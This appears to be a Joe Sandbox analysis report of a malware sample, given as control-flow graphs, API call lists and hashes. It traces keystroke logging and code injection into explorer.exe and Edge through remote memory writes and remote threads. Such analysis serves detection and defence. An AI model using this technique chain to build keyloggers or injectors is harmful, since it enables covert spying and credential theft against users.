                                                        control_flow_graph 0 e3220-e325b call e1838 3 e3261-e3273 CreateToolhelp32Snapshot 0->3 4 e3549-e3554 SleepEx 3->4 5 e3279-e328f Process32First 3->5 4->3 6 e3538-e353a 5->6 7 e3294-e32ac lstrcmpi 6->7 8 e3540-e3543 CloseHandle 6->8 9 e348c-e3495 call e1bb0 7->9 10 e32b2-e32c6 7->10 8->4 14 e352a-e3532 Process32Next 9->14 15 e349b-e34a4 call e1c08 9->15 10->9 16 e32cc-e32e0 10->16 14->6 15->14 20 e34aa-e34b1 call e1c28 15->20 16->9 21 e32e6-e32fa 16->21 20->14 25 e34b3-e34c1 call e1b70 20->25 21->9 26 e3300-e3314 21->26 25->14 31 e34c3-e3525 call e1938 call e2860 call e1938 25->31 26->9 30 e331a-e332e 26->30 30->9 34 e3334-e3348 30->34 31->14 34->9 40 e334e-e3362 34->40 40->9 43 e3368-e337c 40->43 43->9 45 e3382-e3396 43->45 45->9 47 e339c-e33b0 45->47 47->9 49 e33b6-e33ca 47->49 49->9 51 e33d0-e33e4 49->51 51->9 53 e33ea-e33fe 51->53 53->9 55 e3404-e3418 53->55 55->9 57 e341a-e342e 55->57 57->9 59 e3430-e3444 57->59 59->9 61 e3446-e345a 59->61 61->9 63 e345c-e3470 61->63 63->9 65 e3472-e3486 63->65 65->9 65->14
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.624527841.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_e1000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32lstrcmpi
                                                        • String ID:
                                                        • API String ID: 1122579583-0
                                                        • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                        • Instruction ID: 3c1d8b55e3ff178904e20a1481308595a5ff600b8310a3f59a15f7a6f8feadba
                                                        • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                        • Instruction Fuzzy Hash: 3E813131218A488FE75AEF55EC58FEBB7E1FB50740F54461AA442D71A0EF78EA04CB81

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 67 ea048-ea04b 68 ea055-ea059 67->68 69 ea05b-ea063 68->69 70 ea065 68->70 69->70 71 ea04d-ea053 70->71 72 ea067 70->72 71->68 73 ea06a-ea071 72->73 75 ea07d 73->75 76 ea073-ea07b 73->76 75->73 77 ea07f-ea082 75->77 76->75 78 ea097-ea0a4 77->78 79 ea084-ea092 77->79 89 ea0be-ea0cc call ea00a 78->89 90 ea0a6-ea0a8 78->90 80 ea0ce-ea0e9 79->80 81 ea094-ea095 79->81 83 ea11a-ea11d 80->83 81->78 84 ea11f-ea120 83->84 85 ea122-ea129 83->85 87 ea101-ea105 84->87 88 ea12f-ea133 85->88 91 ea0eb-ea0ee 87->91 92 ea107-ea10a 87->92 93 ea135-ea14e LoadLibraryA 88->93 94 ea190-ea1e4 VirtualProtect * 2 88->94 89->68 96 ea0ab-ea0b2 90->96 91->85 95 ea0f0 91->95 92->85 97 ea10c-ea110 92->97 100 ea14f-ea156 93->100 98 ea1e8-ea1ed 94->98 101 ea0f1-ea0f5 95->101 113 ea0bc 96->113 114 ea0b4-ea0ba 96->114 97->101 102 ea112-ea119 97->102 98->98 103 ea1ef-ea1fe 98->103 100->88 105 ea158 100->105 101->87 106 ea0f7-ea0f9 101->106 102->83 109 ea15a-ea162 105->109 110 ea164-ea16c 105->110 106->87 112 ea0fb-ea0ff 106->112 111 ea16e-ea17a 109->111 110->111 116 ea17c-ea183 111->116 117 ea185-ea18f 111->117 112->87 112->92 113->89 113->96 114->113 116->100
                                                        APIs
                                                        • LoadLibraryA.KERNEL32 ref: 000EA147
                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 000EA1BB
                                                        • VirtualProtect.KERNELBASE ref: 000EA1D9
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.624527841.00000000000E7000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E7000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_e7000_explorer.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual$LibraryLoad
                                                        • String ID:
                                                        • API String ID: 895956442-0
                                                        • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                        • Instruction ID: 1942967e0a7e8a8ee5ce9eacee8d3334c4da41f6bf0ae595b40eab4127ce933e
                                                        • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                        • Instruction Fuzzy Hash: DF51993135899D0ECB34AA399CC47B9B7C1E75F321F18066AC08AD3285D919F8868383

                                                        Execution Graph

                                                        Execution Coverage:9.5%
                                                        Dynamic/Decrypted Code Coverage:97.5%
                                                        Signature Coverage:17.7%
                                                        Total number of Nodes:322
                                                        Total number of Limit Nodes:4
                                                        execution_graph 1017 8162b 1018 8163c 1017->1018 1023 816aa 1017->1023 1019 8164b GetKeyboardState 1018->1019 1018->1023 1020 8165c ToUnicode 1019->1020 1019->1023 1021 81684 1020->1021 1021->1023 1024 816b9 RtlEnterCriticalSection 1021->1024 1025 817ce RtlLeaveCriticalSection 1024->1025 1026 816d2 lstrlenW 1024->1026 1025->1023 1027 817bd 1026->1027 1028 816ed lstrlenW 1026->1028 1027->1025 1029 81702 1028->1029 1030 8174e GetForegroundWindow 1029->1030 1031 81723 1029->1031 1030->1027 1032 8175a GetWindowTextW 1030->1032 1031->1027 1043 817dc 1031->1043 1033 8177a lstrcmpW 1032->1033 1034 81771 GetClassNameW 1032->1034 1036 8178b lstrcpyW 1033->1036 1037 817bf lstrcatW 1033->1037 1034->1033 1039 817dc 4 API calls 1036->1039 1037->1027 1038 8172f wsprintfW 1040 817b6 1038->1040 1041 81798 wsprintfW 1039->1041 1042 829eb 3 API calls 1040->1042 1041->1040 1042->1027 1046 82a09 GetProcessHeap RtlAllocateHeap 1043->1046 1045 817ed GetLocalTime wsprintfW 1045->1038 1046->1045 1047 8182d 1048 81838 RtlEnterCriticalSection lstrlenW 1047->1048 1049 818a8 RtlLeaveCriticalSection Sleep 1048->1049 1053 81854 1048->1053 1049->1048 1052 829eb VirtualQuery GetProcessHeap HeapFree 1052->1053 1053->1049 1053->1052 1056 825a4 1053->1056 1062 8200d 1053->1062 1073 829ae VirtualFree 1053->1073 1074 82a09 GetProcessHeap RtlAllocateHeap 1053->1074 1057 825e8 1056->1057 1058 825b9 CryptBinaryToStringA 1056->1058 1057->1053 1058->1057 1059 825cc 1058->1059 1075 82a09 GetProcessHeap RtlAllocateHeap 1059->1075 1061 825d7 CryptBinaryToStringA 1061->1057 1063 82030 1062->1063 1064 82023 lstrlen 1062->1064 1076 82a09 GetProcessHeap RtlAllocateHeap 1063->1076 1064->1063 1066 82038 lstrcat 1067 8206d lstrcat 1066->1067 1068 82074 1066->1068 1067->1068 1077 820a1 1068->1077 1071 829eb 3 API calls 1072 82097 1071->1072 1072->1053 1073->1053 1074->1053 1075->1061 1076->1066 1111 8240f 1077->1111 1081 820ce 1116 8298a lstrlen MultiByteToWideChar 1081->1116 1083 820dd 1117 824cc RtlZeroMemory 1083->1117 1086 8212f RtlZeroMemory 1088 82164 1086->1088 1087 829eb 3 API calls 1089 82084 1087->1089 1092 823f1 1088->1092 1094 82192 1088->1094 1119 8243d 1088->1119 1089->1071 1091 823d7 1091->1092 1093 829eb 3 API calls 1091->1093 1092->1087 1093->1092 1094->1091 1128 82a09 GetProcessHeap RtlAllocateHeap 1094->1128 1096 82262 wsprintfW 1097 82288 1096->1097 1101 822f5 1097->1101 1129 82a09 GetProcessHeap RtlAllocateHeap 1097->1129 1099 822c2 wsprintfW 1099->1101 1100 823b4 1102 829eb 3 API calls 1100->1102 1101->1100 1130 82a09 GetProcessHeap RtlAllocateHeap 1101->1130 1104 823c8 1102->1104 1104->1091 1105 829eb 3 API calls 1104->1105 1105->1091 1106 823ad 1109 829eb 3 API calls 1106->1109 1107 82340 1107->1106 1131 829bd VirtualAlloc 1107->1131 1109->1100 1110 8239a RtlMoveMemory 1110->1106 1112 820c0 1111->1112 1113 82419 1111->1113 1115 82a09 GetProcessHeap RtlAllocateHeap 1112->1115 1114 82841 2 API calls 1113->1114 1114->1112 1115->1081 1116->1083 1118 820ed 1117->1118 1118->1086 1118->1092 1121 8244a 1119->1121 1123 824ab 1119->1123 1120 8244e DnsQuery_W 1120->1121 1121->1120 1122 8248d DnsFree inet_ntoa 1121->1122 1121->1123 1122->1121 1124 824ad 1122->1124 1123->1094 1132 82a09 GetProcessHeap RtlAllocateHeap 1124->1132 1126 824b7 1133 8298a lstrlen MultiByteToWideChar 1126->1133 1128->1096 1129->1099 1130->1107 1131->1110 1132->1126 1133->1123 770 89ae0 771 89ca4 770->771 772 89aeb 770->772 771->771 773 89bfa LoadLibraryA 772->773 777 89c3f VirtualProtect VirtualProtect 772->777 774 89c11 773->774 774->772 776 89c23 GetProcAddress 774->776 776->774 778 89c39 776->778 777->771 779 81000 780 81010 779->780 781 81007 779->781 783 81016 781->783 823 82724 VirtualQuery 783->823 786 81098 786->780 788 8102c RtlMoveMemory 789 8104d 788->789 790 81072 NtUnmapViewOfSection GetCurrentProcessId 788->790 851 82a09 GetProcessHeap RtlAllocateHeap 789->851 792 8109f 790->792 793 81093 790->793 826 810a5 792->826 793->786 794 81096 793->794 852 813ae RtlZeroMemory VirtualQuery 794->852 796 81053 RtlMoveMemory 796->790 797 810a4 799 82a09 GetProcessHeap RtlAllocateHeap 797->799 800 810bf 799->800 801 82a09 GetProcessHeap RtlAllocateHeap 800->801 802 810cc wsprintfA 801->802 806 810f3 802->806 803 8276d OpenFileMappingA MapViewOfFile 803->806 804 8129a Sleep 804->806 805 82841 lstrlen lstrlen 805->806 806->803 806->804 806->805 807 8275a UnmapViewOfFile CloseHandle 806->807 808 81148 806->808 807->804 808->806 809 82a09 GetProcessHeap RtlAllocateHeap 808->809 812 829eb VirtualQuery GetProcessHeap HeapFree 808->812 814 8127e CloseHandle 808->814 817 81266 Process32Next 808->817 818 812ae 16 API calls 808->818 819 826c9 OpenProcess IsWow64Process IsWow64Process CloseHandle 808->819 820 82724 VirtualQuery 808->820 821 81208 lstrcmpi 808->821 822 818bf 30 API calls 808->822 810 81150 RtlMoveMemory CreateToolhelp32Snapshot 809->810 810->808 811 81171 Process32First 810->811 813 8118d 811->813 811->814 812->808 815 81190 CharLowerA 813->815 814->808 816 811ab lstrcmpi 815->816 815->817 816->808 816->817 817->808 817->815 818->808 819->808 820->808 821->808 822->808 824 8101e 823->824 824->786 825 82a09 GetProcessHeap RtlAllocateHeap 824->825 825->788 881 82a09 GetProcessHeap RtlAllocateHeap 826->881 828 810bf 882 82a09 GetProcessHeap RtlAllocateHeap 828->882 830 810cc wsprintfA 834 810f3 830->834 832 8129a Sleep 832->834 833 82841 lstrlen lstrlen 833->834 834->832 834->833 836 81148 834->836 883 8276d OpenFileMappingA 834->883 948 8275a UnmapViewOfFile CloseHandle 834->948 836->834 842 8127e CloseHandle 836->842 845 81266 Process32Next 836->845 848 82724 VirtualQuery 836->848 849 81208 lstrcmpi 836->849 886 82a09 GetProcessHeap RtlAllocateHeap 836->886 887 812ae 836->887 906 826c9 OpenProcess 836->906 912 818bf 836->912 943 829eb 836->943 838 81150 RtlMoveMemory CreateToolhelp32Snapshot 838->836 839 81171 Process32First 838->839 841 8118d 839->841 839->842 843 81190 CharLowerA 841->843 842->836 844 811ab lstrcmpi 843->844 843->845 844->836 844->845 845->836 845->843 848->836 849->836 851->796 853 813e4 852->853 973 82a09 GetProcessHeap RtlAllocateHeap 853->973 855 81402 GetModuleFileNameA 974 82a09 GetProcessHeap RtlAllocateHeap 855->974 857 81418 GetCurrentProcessId wsprintfA 975 82799 CryptAcquireContextA 857->975 860 8151b 862 829eb 3 API calls 860->862 861 8145f RtlInitializeCriticalSection 980 82a09 GetProcessHeap RtlAllocateHeap 861->980 864 81522 862->864 866 829eb 3 API calls 864->866 865 8147f Sleep 981 825f1 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 865->981 868 81529 RtlExitUserThread 866->868 870 81533 868->870 869 81496 GetModuleHandleA GetProcAddress 871 814b5 869->871 872 814c6 GetModuleHandleA GetProcAddress 869->872 870->792 989 81f3a 871->989 874 814d9 872->874 875 814ea GetModuleHandleA 872->875 876 81f3a 3 API calls 874->876 999 81e89 875->999 876->875 879 825f1 10 API calls 880 81501 CreateThread CloseHandle 879->880 880->860 881->828 882->830 884 82781 MapViewOfFile 883->884 885 82794 883->885 884->885 885->834 886->838 888 812c5 887->888 904 813a4 887->904 888->904 949 829bd VirtualAlloc 888->949 890 812d9 lstrlen 950 82a09 GetProcessHeap RtlAllocateHeap 890->950 892 812f0 893 81351 892->893 951 82841 lstrlen lstrlen 892->951 895 829eb 3 API calls 893->895 903 81375 895->903 897 81399 957 829ae VirtualFree 897->957 898 81329 RtlMoveMemory 953 82569 898->953 899 81353 RtlMoveMemory 902 82569 2 API calls 899->902 902->893 903->897 905 81388 PathMatchSpecA 903->905 904->836 905->897 905->903 907 8271c 906->907 908 826e7 IsWow64Process 906->908 907->836 909 826f8 IsWow64Process 908->909 910 8270a 908->910 909->910 911 82715 CloseHandle 909->911 910->911 911->907 913 82724 VirtualQuery 912->913 914 818d9 913->914 915 818eb OpenProcess 914->915 916 81b1c 914->916 915->916 917 81904 915->917 916->836 918 82724 VirtualQuery 917->918 919 8190b 918->919 919->916 920 81919 NtSetInformationProcess 919->920 921 81935 919->921 920->921 958 81b26 921->958 924 81b26 2 API calls 925 8197c 924->925 926 81b19 CloseHandle 925->926 927 81b26 2 API calls 925->927 926->916 928 819a6 927->928 964 81bbd 928->964 931 81b26 2 API calls 932 819d6 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 931->932 933 81a2b 932->933 934 81af4 CreateRemoteThread 932->934 935 81a31 CreateMutexA GetLastError 933->935 939 81a61 GetModuleHandleA GetProcAddress ReadProcessMemory 933->939 936 81b0b CloseHandle 934->936 935->933 937 81a4d CloseHandle Sleep 935->937 938 81b0d CloseHandle CloseHandle 936->938 937->935 938->926 940 81aed 939->940 941 81a92 WriteProcessMemory 939->941 940->936 940->938 941->940 942 81abc CreateRemoteThread CloseHandle Sleep WriteProcessMemory 941->942 942->940 944 82724 VirtualQuery 943->944 945 829f3 944->945 946 82a07 945->946 947 829f7 GetProcessHeap HeapFree 945->947 946->836 947->946 948->832 949->890 950->892 952 8130c RtlZeroMemory 951->952 952->898 952->899 954 825a1 953->954 955 82577 lstrlen RtlMoveMemory 953->955 954->892 955->954 957->904 959 81b3a 958->959 962 8195a 958->962 960 81b4a NtCreateSection 959->960 961 81b69 959->961 960->961 961->962 963 81b7e NtMapViewOfSection 961->963 962->924 963->962 965 81bd4 964->965 971 81c06 964->971 966 81bd6 RtlMoveMemory 965->966 966->966 966->971 967 81c69 968 819b6 NtUnmapViewOfSection 967->968 970 81c87 LdrProcessRelocationBlock 967->970 968->931 969 81c17 LoadLibraryA 969->968 969->971 970->967 970->968 971->967 971->969 972 81c47 GetProcAddress 971->972 972->968 972->971 973->855 974->857 976 81445 CreateMutexA GetLastError 975->976 977 827bf CryptCreateHash lstrlen CryptHashData CryptGetHashParam 975->977 976->860 976->861 978 82805 wsprintfA 977->978 978->978 979 82827 CryptDestroyHash CryptReleaseContext 978->979 979->976 980->865 982 82631 981->982 983 82681 CloseHandle 982->983 984 82671 Thread32Next 982->984 985 8263d OpenThread 982->985 983->869 984->982 986 82658 SuspendThread 985->986 987 82660 ResumeThread 985->987 988 82666 CloseHandle 986->988 987->988 988->984 990 81fad 989->990 991 81f44 989->991 990->872 991->990 1008 81fea VirtualProtect 991->1008 993 81f5b 993->990 1009 829bd VirtualAlloc 993->1009 995 81f67 996 81f71 RtlMoveMemory 995->996 997 81f84 995->997 996->997 1010 81fea VirtualProtect 997->1010 1000 82724 VirtualQuery 999->1000 1001 81e93 1000->1001 1002 814fa 1001->1002 1011 81ed8 1001->1011 1002->879 1006 81eba 1006->1002 1016 81fea VirtualProtect 1006->1016 1008->993 1009->995 1010->990 1012 81eea 1011->1012 1014 81e9e 1011->1014 1013 81f04 lstrcmp 1012->1013 1012->1014 1013->1012 1013->1014 1014->1002 1015 81fea VirtualProtect 1014->1015 1015->1006 1016->1002 1134 81581 1135 8158e 1134->1135 1136 81623 1135->1136 1137 815a7 GlobalFix 1135->1137 1137->1136 1138 815b5 1137->1138 1139 815c0 1138->1139 1140 815e4 1138->1140 1142 815f2 1139->1142 1143 815c5 lstrlenW 1139->1143 1155 8293e 1140->1155 1144 82724 VirtualQuery 1142->1144 1154 82a09 GetProcessHeap RtlAllocateHeap 1143->1154 1146 815fb 1144->1146 1148 8161b GlobalUnWire 1146->1148 1149 815ff lstrlenW 1146->1149 1147 815d8 lstrcatW 1147->1142 1148->1136 1149->1148 1150 8160a 1149->1150 1151 816b9 19 API calls 1150->1151 1152 81614 1151->1152 1153 829eb 3 API calls 1152->1153 1153->1148 1154->1147 1156 8294d lstrlen 1155->1156 1157 82982 1155->1157 1162 82a09 GetProcessHeap RtlAllocateHeap 1156->1162 1157->1142 1159 82963 MultiByteToWideChar 1159->1157 1160 8297b 1159->1160 1161 829eb 3 API calls 1160->1161 1161->1157 1162->1159

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_00081E89 18 Function_00082724 0->18 37 Function_00081ED8 0->37 43 Function_00081FEA 0->43 1 Function_00082A09 2 Function_0008298A 3 Function_0008200D 3->1 17 Function_000820A1 3->17 44 Function_000829EB 3->44 4 Function_0008288D 5 Function_0008268F 6 Function_0008240F 36 Function_00082841 6->36 7 Function_00081000 10 Function_00081016 7->10 8 Function_00081581 8->1 8->18 24 Function_000816B9 8->24 29 Function_0008293E 8->29 8->44 9 Function_00082799 10->1 10->4 10->5 14 Function_000812AE 10->14 15 Function_000826AE 10->15 16 Function_000813AE 10->16 10->18 20 Function_000810A5 10->20 30 Function_000818BF 10->30 34 Function_000826C9 10->34 10->36 38 Function_0008275A 10->38 10->44 45 Function_0008276D 10->45 11 Function_0008162B 11->24 12 Function_0008182D 12->1 12->3 13 Function_000829AE 12->13 19 Function_000825A4 12->19 12->44 14->1 14->13 26 Function_000829BD 14->26 14->36 39 Function_0008255C 14->39 41 Function_00082569 14->41 14->44 16->0 16->1 16->9 25 Function_00081F3A 16->25 16->44 48 Function_000825F1 16->48 17->1 17->2 17->4 17->6 17->26 28 Function_0008243D 17->28 35 Function_000824CC 17->35 17->44 19->1 20->1 20->4 20->5 20->14 20->15 20->18 20->30 20->34 20->36 20->38 20->44 20->45 21 Function_00081E26 31 Function_00081CBF 21->31 22 Function_00081B26 23 Function_00083627 40 Function_000817DC 24->40 24->44 25->26 33 Function_00081FB4 25->33 25->43 47 Function_00081E66 25->47 27 Function_00081BBD 28->1 28->2 29->1 29->44 30->18 30->22 30->27 32 Function_00081533 33->21 40->1 42 Function_000829E9 44->18 46 Function_00089AE0 47->31

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00082724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,000829F3,-00000001,0008128C), ref: 00082731
                                                          • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                          • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00081038
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0008106C
                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00081075
                                                        • GetCurrentProcessId.KERNEL32(?,00081010), ref: 0008107B
                                                        • wsprintfA.USER32 ref: 000810E7
                                                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00081155
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081160
                                                        • Process32First.KERNEL32(00000000,?), ref: 0008117F
                                                        • CharLowerA.USER32(?), ref: 00081199
                                                        • lstrcmpi.KERNEL32(?,explorer.exe), ref: 000811B5
                                                        • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081212
                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0008126C
                                                        • CloseHandle.KERNEL32(00000000), ref: 0008127F
                                                        • Sleep.KERNELBASE(000003E8), ref: 0008129F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                        • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                        • API String ID: 3206029838-2805246637
                                                        • Opcode ID: 90536ab19f4f6bce970e7a6ad40275f1c3b84ea01975481b8196837e06f2b1ed
                                                        • Instruction ID: c891c7935db4289d37885e744c3d10944dcfcb3c9ed39a47a4427c91ed757d4e
                                                        • Opcode Fuzzy Hash: 90536ab19f4f6bce970e7a6ad40275f1c3b84ea01975481b8196837e06f2b1ed
                                                        • Instruction Fuzzy Hash: 2251C5302047019BD714BF74DC599BA77EDFF84B41F040528F9D6972A2EA389A468F62

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00082A09: GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                          • Part of subcall function 00082A09: RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                        • wsprintfA.USER32 ref: 000810E7
                                                          • Part of subcall function 0008276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00082777
                                                          • Part of subcall function 0008276D: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,000810FE), ref: 00082789
                                                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00081155
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081160
                                                        • Process32First.KERNEL32(00000000,?), ref: 0008117F
                                                        • CharLowerA.USER32(?), ref: 00081199
                                                        • lstrcmpi.KERNEL32(?,explorer.exe), ref: 000811B5
                                                        • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00081212
                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0008126C
                                                        • CloseHandle.KERNEL32(00000000), ref: 0008127F
                                                        • Sleep.KERNELBASE(000003E8), ref: 0008129F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                        • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                        • API String ID: 3018447944-2805246637
                                                        • Opcode ID: 8618b74207d87235530d0522142eaa1206f961f1ce3d32bd0a57018a044c5dec
                                                        • Instruction ID: a52374c8d3c32c87d7b7eec75c6ac1f607deb3f7449bc71aaab08c49aa80d9b3
                                                        • Opcode Fuzzy Hash: 8618b74207d87235530d0522142eaa1206f961f1ce3d32bd0a57018a044c5dec
                                                        • Instruction Fuzzy Hash: 6F41A1302047019BD714BF649C959BE77EDFF84B50F000628B9D6972E2EF389E068B62

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 122 89ae0-89ae5 123 89aeb-89af8 122->123 124 89cad 122->124 125 89b0a-89b0f 123->125 124->124 126 89b11 125->126 127 89b00-89b05 126->127 128 89b13 126->128 130 89b06-89b08 127->130 129 89b18-89b1a 128->129 131 89b1c-89b21 129->131 132 89b23-89b27 129->132 130->125 130->126 131->132 132->129 133 89b29 132->133 134 89b2b-89b32 133->134 135 89b34-89b39 133->135 134->129 134->135 136 89b48-89b4a 135->136 137 89b3b-89b44 135->137 140 89b4c-89b51 136->140 141 89b53-89b57 136->141 138 89bba-89bbd 137->138 139 89b46 137->139 142 89bc2-89bc5 138->142 139->136 140->141 143 89b59-89b5e 141->143 144 89b60-89b62 141->144 147 89bc7-89bc9 142->147 143->144 145 89b84-89b93 144->145 146 89b64 144->146 149 89ba4-89bb1 145->149 150 89b95-89b9c 145->150 148 89b65-89b67 146->148 147->142 151 89bcb-89bce 147->151 153 89b69-89b6e 148->153 154 89b70-89b74 148->154 149->149 156 89bb3-89bb5 149->156 150->150 155 89b9e 150->155 151->142 152 89bd0-89bec 151->152 152->147 157 89bee 152->157 153->154 154->148 158 89b76 154->158 155->130 156->130 159 89bf4-89bf8 157->159 160 89b78-89b7f 158->160 161 89b81 158->161 162 89bfa-89c10 LoadLibraryA 159->162 163 89c3f-89c42 159->163 160->148 160->161 161->145 164 89c11-89c16 162->164 165 89c45-89c4c 163->165 164->159 166 89c18-89c1a 164->166 167 89c4e-89c50 165->167 168 89c70-89ca0 VirtualProtect * 2 165->168 170 89c1c-89c22 166->170 171 89c23-89c30 GetProcAddress 166->171 172 89c52-89c61 167->172 173 89c63-89c6e 167->173 169 89ca4-89ca8 168->169 169->169 174 89caa 169->174 170->171 175 89c39-89c3c 171->175 176 89c32-89c37 171->176 172->165 173->172 174->124 176->164
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000088000.00000040.80000000.00040000.00000000.sdmp, Offset: 00088000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_88000_explorer.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 761afedd686cb8d8ddbda319575de0f1710e3ed48b48c1cc1c0ee351131be086
                                                        • Instruction ID: 0d37eedbe500ee790c8412a6b65a8675b6b3dcc5f5d5e4945e36827d966a7865
                                                        • Opcode Fuzzy Hash: 761afedd686cb8d8ddbda319575de0f1710e3ed48b48c1cc1c0ee351131be086
                                                        • Instruction Fuzzy Hash: 495124B1A446524AD721BA78DD807B5BBE4FB52334B2C0739C5E6CB3C6E7A45806C7A0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 177 8276d-8277f OpenFileMappingA 178 82781-82791 MapViewOfFile 177->178 179 82794-82798 177->179 178->179
                                                        APIs
                                                        • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00082777
                                                        • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,000810FE), ref: 00082789
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$MappingOpenView
                                                        • String ID:
                                                        • API String ID: 3439327939-0
                                                        • Opcode ID: f697b1d04ea33550ba84d640e082f874987e236cd832537d4e05d0301a145ddd
                                                        • Instruction ID: b6b55214a3d7b72dd5065cc7f6cf5cc5cfe51089837142714a1d2e3023f5fcf5
                                                        • Opcode Fuzzy Hash: f697b1d04ea33550ba84d640e082f874987e236cd832537d4e05d0301a145ddd
                                                        • Instruction Fuzzy Hash: 23D01732715231BBE3745A7B6C0CF83AEDDEFC6AE1B010025B94DD2190D6648810C7F0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 180 8275a-8276c UnmapViewOfFile CloseHandle
                                                        APIs
                                                        • UnmapViewOfFile.KERNEL32(00000000,?,0008129A,00000001), ref: 0008275E
                                                        • CloseHandle.KERNELBASE(?), ref: 00082765
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.624509871.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CloseFileHandleUnmapView
                                                        • String ID:
                                                        • API String ID: 2381555830-0
                                                        • Opcode ID: 8c5060b8b4834943f5dc63203dbdcab3c3850551d53c9b689452f560daeb98f7
                                                        • Instruction ID: e78c18ebb3f3fe14dbe1de984ec7bdf689ac5a628f3d417fc22d0e2a98b1dd89
                                                        • Opcode Fuzzy Hash: 8c5060b8b4834943f5dc63203dbdcab3c3850551d53c9b689452f560daeb98f7
                                                        • Instruction Fuzzy Hash: 7AB0123241503097E32427347C1C9DB3E18FFC96213050144F54D810104B2C0A018FE8

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 181 82a09-82a19 GetProcessHeap RtlAllocateHeap
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000A000,000810BF), ref: 00082A0C
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00082A13
                                                        Memory Dump Source
